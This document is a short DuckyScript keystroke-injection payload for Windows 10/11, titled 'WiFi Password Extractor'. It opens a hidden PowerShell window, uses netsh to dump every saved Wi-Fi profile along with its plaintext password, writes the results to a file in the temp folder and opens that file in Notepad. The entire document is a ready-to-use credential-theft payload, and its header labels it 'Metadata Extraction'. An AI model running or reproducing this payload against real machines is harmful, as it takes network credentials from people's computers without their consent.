REM =====================================================
REM Title: WiFi Password Extractor
REM Author: yogeshjoga
REM Target: Windows 10/11
REM Category: Metadata Extraction
REM Description: Extracts all saved WiFi passwords
REM =====================================================

DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Out-File $env:TEMP\wifi.txt; notepad $env:TEMP\wifi.txt; exit
ENTER
